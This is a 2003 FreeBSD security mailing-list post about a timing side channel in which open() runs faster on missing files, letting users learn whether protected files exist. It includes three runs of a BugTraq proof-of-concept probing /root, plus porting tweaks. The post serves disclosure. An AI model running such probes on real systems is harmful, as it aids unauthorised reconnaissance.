From owner-freebsd-security@FreeBSD.ORG Mon Apr 7 12:02:51 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2D89B37B401 for ; Mon, 7 Apr 2003 12:02:51 -0700 (PDT) Received: from ms-smtp-01.nyroc.rr.com (ms-smtp-01.nyroc.rr.com [24.92.226.148]) by mx1.FreeBSD.org (Postfix) with ESMTP id 49A1043FBF for ; Mon, 7 Apr 2003 12:02:50 -0700 (PDT) (envelope-from njyoder@gummibears.nu) Received: from chesire (roc-66-66-19-79.rochester.rr.com [66.66.19.79]) h37J2ipL028622 for ; Mon, 7 Apr 2003 15:02:44 -0400 (EDT) Resent-Date: Mon, 7 Apr 2003 15:02:44 -0400 (EDT) Resent-Message-Id: <200304071902.h37J2ipL028622@ms-smtp-01.nyroc.rr.com> Date: Mon, 7 Apr 2003 15:02:42 -0400 From: "Nathan J. Yoder" X-Mailer: The Bat! (v1.62i) Educational X-Priority: 3 (Normal) Message-ID: <11345416793.20030407150242@gummibears.nu> To: freebsd-security@freebsd.org Resent-From: "Nathan J. Yoder" MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Subject: timing related vunlerability that reveals whether files exist without regard to permissions X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list Reply-To: "Nathan J. Yoder" List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Mon, 07 Apr 2003 19:02:51 -0000 There was a recent post to BugTraq (April 2nd) detailing a multi-platform vulnerability. An archived copy of this posting can be found at http://www.securityfocus.com/archive/1/317425. This vulnerability is a timing based attack on system calls that can be used to reveal whether or not a file exists without regard to permissions. The attack works based off the fact that using the open() system call to test whether a file exists will return significantly faster if the file doesn't exist (about 4 times faster in my testing). This vulnerability in itself does not present a serious security risk, however as outlined by the BugTraq post it can be used in conjunction with another attack. Even worse, the idea that such a timing related vulnerability exists and that it wasn't accounted for at all suggests that many other system calls and aspects of various OSes (not just FreeBSD) may be vulnerable to more serious timing related vulnerabilities. Call me paranoid, but in lieu of this, the ssl timing attack (ability to derive the private key), the recent qpopper one (ability to test to see if users exist), my daemon-sense is tingling, telling me that there is going to be a huge flood of timing attacks over the next few years. One of the problems is that compensating for this is not easy because there is no generic solution short of adding intentional delays (like with Matt Blaze's? quantization library), which gives you a fixed performance penalty. TESTING DETAILS I ran the following commands on a FreeBSD 4.7-RELEASE computer using the exploit provided in the BugTraq posting. Provided below is 3 trial runs of the program. Note the time discrepancy between trying to open an existing and non-existent file. NOTE: I needed to remove the O_SYNC flag from the "int flags" line (it doesn't seem to exist on 4.7-R) and I needed to include the header file in the exploit to make it work. [njyoder@topcat ~/temp]$ uname -a FreeBSD topcat.mine.nu 4.7-RELEASE-p6 FreeBSD 4.7-RELEASE-p6 #21: Sat Mar 1 06:07:58 EST 2003 njyoder@topcat.mine.nu:/usr/obj/usr/src/sys/TOPCAT i386 [njyoder@topcat ~/temp]$ ./evil [+] creating unreachable [+] creating unreachable/iexist [+] chmod 0'ing unreachable [+] d--------- 2 njyoder users 512 Apr 5 17:29 unreachable/ [+] Timing open() on unreachable/iexist [+] Successful: 83 usecs, got m [+] Timing open() on unreachable/non-existant [+] Failure: 22 usecs, got m [+] Using 35 as our cutoff. [+] testing /root/.bashrc and /root/non-existant [+] /root/.bashrc doesn't exist (29 usecs), got m [+] /root/non-existant doesn't exist (21 usecs), got m [+] cleaning up [njyoder@topcat ~/temp]$ ./evil [+] creating unreachable [+] creating unreachable/iexist [+] chmod 0'ing unreachable [+] d--------- 2 njyoder users 512 Apr 5 17:30 unreachable/ [+] Timing open() on unreachable/iexist [+] Successful: 86 usecs, got m [+] Timing open() on unreachable/non-existant [+] Failure: 23 usecs, got m [+] Using 36 as our cutoff. [+] testing /root/.bashrc and /root/non-existant [+] /root/.bashrc doesn't exist (28 usecs), got m [+] /root/non-existant doesn't exist (22 usecs), got m [+] cleaning up [njyoder@topcat ~/temp]$ ./evil [+] creating unreachable [+] creating unreachable/iexist [+] chmod 0'ing unreachable [+] d--------- 2 njyoder users 512 Apr 5 17:30 unreachable/ [+] Timing open() on unreachable/iexist [+] Successful: 84 usecs, got m [+] Timing open() on unreachable/non-existant [+] Failure: 22 usecs, got m [+] Using 35 as our cutoff. [+] testing /root/.bashrc and /root/non-existant [+] /root/.bashrc doesn't exist (27 usecs), got m [+] /root/non-existant doesn't exist (20 usecs), got m [+] cleaning up ------------------------------------------------ Nathan J. Yoder http://www.gummibears.nu/ http://www.gummibears.nu/files/njyoder_pgp.key ------------------------------------------------